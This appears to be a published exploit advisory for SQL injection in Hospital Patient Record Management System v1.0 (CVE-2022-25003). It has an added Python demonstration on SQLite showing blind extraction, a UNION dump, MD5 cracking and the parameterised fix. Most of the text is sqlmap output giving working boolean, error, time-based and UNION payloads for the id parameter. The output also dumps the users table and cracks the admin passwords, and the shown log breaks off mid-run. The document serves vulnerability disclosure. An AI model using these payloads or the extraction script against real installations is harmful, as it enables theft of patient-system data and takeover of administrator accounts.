## Title: Hospital Patient Record Management System v1.0 Multiple SQLi
## Author: nu11secur1ty
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-25003
## Description:
The `id` GET parameter of the doctor and patient management pages in Hospital Patient Record Management System v1.0 (`view_doctors.php`, `manage_doctor.php` and `manage_patient.php` in the sqlmap output below) is vulnerable to SQL injection. sqlmap confirms boolean-based blind, error-based, time-based blind and UNION-based injection on each page against the MariaDB back end and uses it to dump the `users` table of `hprms_db`. The stored passwords are unsalted MD5 hashes: both the `admin` and `cblake` hashes were cracked with sqlmap's default wordlist within seconds (`admin123` and `stupid123`). An attacker can therefore take over the administrator account and every other account, and read any table in the database.
Status: CRITICAL
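Added example (not code from the advisory or from the vendor's application): a self-contained re-creation in Python, on an in-memory SQLite database, of what the sqlmap runs below are doing against the `id` parameter. The schema, the doctors row and the wordlist are constructed here, and the shape of the vulnerable query (the request value spliced between single quotes) is an assumption drawn from the payloads; the two user rows reuse the hashes sqlmap dumped. SQLite stands in for MariaDB, so `||` replaces `CONCAT()` and `UNICODE()` replaces `ORD()`, and the error-based and time-based techniques, which depend on MySQL-specific functions, are not reproduced.

```python
import hashlib
import sqlite3

# Constructed data. The two users and their hashes are the ones sqlmap dumped
# from hprms_db; the doctors row and its 8-column layout are stand-ins for the
# real schema, which the advisory does not show.
USERS = [
    (1, "admin", "0192023a7bbd73250516f069df18b500"),
    (2, "cblake", "97a8afcf419cc231e1bdcd8584b0a246"),
]
DOCTORS = [(1, "Sample Doctor", "Physical medicine and rehabilitation",
            "c4", "c5", "c6", "c7", "c8")]
WORDLIST = ["password", "123456", "letmein", "admin", "admin123", "stupid123"]


def make_db():
    """In-memory SQLite stand-in for hprms_db (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE users(id INTEGER, username TEXT, password TEXT);"
        "CREATE TABLE doctors(id INTEGER, name TEXT, specialty TEXT,"
        " c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT);"
    )
    con.executemany("INSERT INTO users VALUES (?,?,?)", USERS)
    con.executemany("INSERT INTO doctors VALUES (?,?,?,?,?,?,?,?)", DOCTORS)
    return con


def vulnerable_lookup(con, doctor_id):
    """Assumed shape of the flawed query: the request value is spliced into the
    SQL text between single quotes, which is why every sqlmap payload in the
    advisory starts by closing that quote (id=1' AND ...)."""
    sql = f"SELECT * FROM doctors WHERE id = '{doctor_id}'"
    return con.execute(sql).fetchall()


def fixed_lookup(con, doctor_id):
    """Parameterised form: the value is bound, so it can never become SQL."""
    return con.execute("SELECT * FROM doctors WHERE id = ?", (doctor_id,)).fetchall()


def boolean_oracle(con, condition):
    """Boolean-based blind: the page shows the doctor row only when the injected
    condition is true; sqlmap detects this with its --string check."""
    rows = vulnerable_lookup(con, f"1' AND ({condition}) AND 'a'='a")
    return len(rows) > 0


def blind_extract(con, subquery, max_len=64):
    """Recover the result of `subquery` one character at a time through the
    oracle, binary-searching each code point (about 7 requests per character).
    SQLite's UNICODE() plays the role of MySQL's ORD()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not boolean_oracle(con, f"LENGTH(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if boolean_oracle(con, f"UNICODE(SUBSTR(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def union_dump(con):
    """UNION-based: with 8 columns in the original SELECT, a users row can be
    returned in place of a doctors row. The negative id keeps the real row out.
    SQLite's || replaces the CONCAT() sqlmap used against MariaDB."""
    payload = ("-5548' UNION ALL SELECT NULL,NULL,username||':'||password,"
               "NULL,NULL,NULL,NULL,NULL FROM users-- -")
    return [row[2] for row in vulnerable_lookup(con, payload)]


def crack_md5(hash_hex, wordlist):
    """Unsalted MD5 ('md5_generic_passwd' in sqlmap): one hash per candidate."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == hash_hex:
            return word
    return None


if __name__ == "__main__":
    con = make_db()
    # The advisory's own boolean-blind payload for view_doctors.php.
    print("true  ->", len(vulnerable_lookup(con, "1' AND 1807=1807 AND 'uYTA'='uYTA")))
    print("false ->", len(vulnerable_lookup(con, "1' AND 1807=1808 AND 'uYTA'='uYTA")))
    for entry in union_dump(con):
        user, digest = entry.split(":")
        print(user, digest, crack_md5(digest, WORDLIST))
    print(blind_extract(con, "SELECT password FROM users WHERE username='admin'"))
    print("fixed ->", fixed_lookup(con, "1' AND 1807=1807 AND 'uYTA'='uYTA"))
```

Running it prints one row for the true boolean payload and none for the false one, both users' hashes via the UNION payload, the admin hash recovered blind through the oracle, the cracked passwords, and an empty result when the same payload is bound as a parameter. Replacing the concatenated query with the bound form is the fix; in PHP that means mysqli or PDO prepared statements, and the `users` table should additionally move from plain MD5 to a salted, slow password hash.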
[+] Payloads:
```text
PS C:\Users\venvaropt\Desktop\CVE-2022-25003> python .\PoC-SQL-automation-all-in-one.py
SQL - Injecting for parameter 'id' in view_doctors.php app
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:57:34 /2022-03-01/
[11:57:34] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=blov3a6cmm7...5ljvdr4pu6'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1807=1807 AND 'uYTA'='uYTA
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6423 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(6423=6423,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'KEjB'='KEjB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3271 FROM (SELECT(SLEEP(3)))ySPv) AND 'vkzK'='vkzK
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-5548' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717071,0x71687362656d5a76494d674d5741614e7542625946744c6c5370416b486e7374717953684d687950,0x71716a7671),NULL,NULL,NULL,NULL,NULL-- -
---
[11:57:35] [INFO] testing MySQL
[11:57:35] [INFO] confirming MySQL
[11:57:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:57:35] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[11:57:35] [INFO] resumed: '0192023a7bbd73250516f069df18b500','admin'
[11:57:35] [INFO] resumed: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[11:57:35] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[11:57:35] [INFO] using hash method 'md5_generic_passwd'
[11:57:35] [INFO] resuming password 'admin123' for hash '0192023a7bbd73250516f069df18b500' for user 'admin'
[11:57:35] [INFO] resuming password 'stupid123' for hash '97a8afcf419cc231e1bdcd8584b0a246' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[11:57:35] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[11:57:35] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 11:57:35 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_doctor.php app
[*] starting @ 11:57:39 /2022-03-01/
[11:57:39] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=fgqostf9v6a...c07feq0430'). Do you want to use those [Y/n] Y
[11:57:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:57:40] [INFO] testing if the target URL content is stable
[11:57:40] [INFO] target URL content is stable
[11:57:40] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:57:40] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:57:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:57:40] [WARNING] reflective value(s) found and filtering out
[11:57:41] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Physical medicine and rehabilitation")
[11:57:41] [INFO] testing 'Generic inline queries'
[11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:57:41] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:57:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[11:57:41] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:57:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:57:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:57:41] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[11:57:41] [INFO] testing 'MySQL inline queries'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:57:41] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:57:47] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:57:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:57:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:57:48] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:57:48] [INFO] target URL appears to have 8 columns in query
[11:57:48] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3060=3060 AND 'WBCY'='WBCY
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(3263=3263,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZQSU'='ZQSU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9794 FROM (SELECT(SLEEP(3)))mBlw) AND 'oVQB'='oVQB
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-5127' UNION ALL SELECT CONCAT(0x717a706a71,0x76436c4774624e78647045456f474773684944566f594345496f547a7146686e6477744e49516b51,0x71766a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[11:57:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:57:48] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[11:57:49] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[11:57:49] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[11:57:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[11:57:49] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[11:57:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[11:57:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[11:57:49] [INFO] starting 4 processes
[11:57:54] [INFO] cracked password 'admin123' for user 'admin'
[11:58:04] [INFO] cracked password 'stupid123' for user 'cblake'
[11:58:07] [INFO] current status: brawl... \
[11:58:07] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[11:58:07] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[11:58:07] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 11:58:07 /2022-03-01/
Traceback (most recent call last):
File "C:\Users\venvaropt\Desktop\CVE-2022-25003\PoC-SQL-automation-all-in-one.py", line 26, in <module>
os.system('python C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\sqlmap.py -u http://localhost/hprms/admin/doctors/manage_doctor.php?id=1 -p id --time-sec 3 --dbms=mysql --batch --answers="crack=Y,dict=Y,continue=Y,quit=N" -D hprms_db -T users -C username,password --dump')
KeyboardInterrupt
PS C:\Users\venvaropt\Desktop\CVE-2022-25003>
PS C:\Users\venvaropt\Desktop\CVE-2022-25003> python .\PoC-SQL-automation-all-in-one.py
SQL - Injecting for parameter 'id' in view_doctors.php app
[*] starting @ 12:01:23 /2022-03-01/
[12:01:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=62sg9tou51d...eqmgoe9q93'). Do you want to use those [Y/n] Y
[12:01:23] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:01:23] [INFO] testing if the target URL content is stable
[12:01:24] [INFO] target URL content is stable
[12:01:24] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:01:24] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:01:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:01:24] [WARNING] reflective value(s) found and filtering out
[12:01:24] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Sample Ward Room Good for 6 Patient")
[12:01:24] [INFO] testing 'Generic inline queries'
[12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:01:24] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:01:24] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:01:24] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:01:24] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:01:24] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:01:24] [INFO] testing 'MySQL inline queries'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:01:24] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:01:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:01:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:01:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:01:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:01:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:01:31] [INFO] target URL appears to have 8 columns in query
[12:01:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8906=8906 AND 'Accs'='Accs
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1670 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1670=1670,1))),0x71706b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UIHB'='UIHB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6841 FROM (SELECT(SLEEP(3)))ujWo) AND 'sPMh'='sPMh
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-1901' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x626561436b5273424d6544724748464f566f6851426f484a464c666a777a4768724b61577878704f,0x71706b7671),NULL,NULL,NULL,NULL-- -
---
[12:01:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP 8.1.2, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:01:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:01:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:01:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:01:31] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:01:32] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:01:32] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:01:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:01:32] [INFO] starting 4 processes
[12:01:38] [INFO] cracked password 'admin123' for user 'admin'
[12:01:48] [INFO] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:02:09] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:02:09] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:02:09 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_doctor.php app
[*] starting @ 12:02:13 /2022-03-01/
[12:02:13] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4tp11beihnp...3genbf0lef'). Do you want to use those [Y/n] Y
[12:02:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:02:13] [INFO] testing if the target URL content is stable
[12:02:14] [INFO] target URL content is stable
[12:02:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:02:14] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:02:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:02:14] [WARNING] reflective value(s) found and filtering out
[12:02:14] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Physical medicine and rehabilitation")
[12:02:14] [INFO] testing 'Generic inline queries'
[12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:02:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:02:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:02:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:02:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:02:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:02:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:02:14] [INFO] testing 'MySQL inline queries'
[12:02:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:02:14] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:02:21] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:02:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:02:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:02:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:02:21] [INFO] target URL appears to have 8 columns in query
[12:02:21] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3105=3105 AND 'nrvQ'='nrvQ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5846 FROM(SELECT COUNT(*),CONCAT(0x7170767071,(SELECT (ELT(5846=5846,1))),0x717a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NGNn'='NGNn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4775 FROM (SELECT(SLEEP(3)))kUeP) AND 'LHyf'='LHyf
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-4962' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x47746f4c5467486944786f586c45764a6c59724e6c415375424f5246744c486c456b455055764c70,0x717a706b71),NULL,NULL,NULL,NULL,NULL-- -
---
[12:02:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, PHP, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:02:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:02:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:02:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:02:21] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:02:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:02:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:02:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:02:21] [INFO] starting 4 processes
[12:02:30] [INFO] cracked password 'admin123' for user 'admin'
[12:02:36] [INFO] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:03:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:03:01] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:03:01 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_patient.php app
[*] starting @ 12:03:05 /2022-03-01/
[12:03:06] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=3timnfi1ddl...4mandk4la0'). Do you want to use those [Y/n] Y
[12:03:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:03:06] [INFO] testing if the target URL content is stable
[12:03:07] [INFO] target URL content is stable
[12:03:07] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:03:07] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:03:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:03:07] [WARNING] reflective value(s) found and filtering out
[12:03:07] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Over There Street, Here City, Anywhere, 2306")
[12:03:07] [INFO] testing 'Generic inline queries'
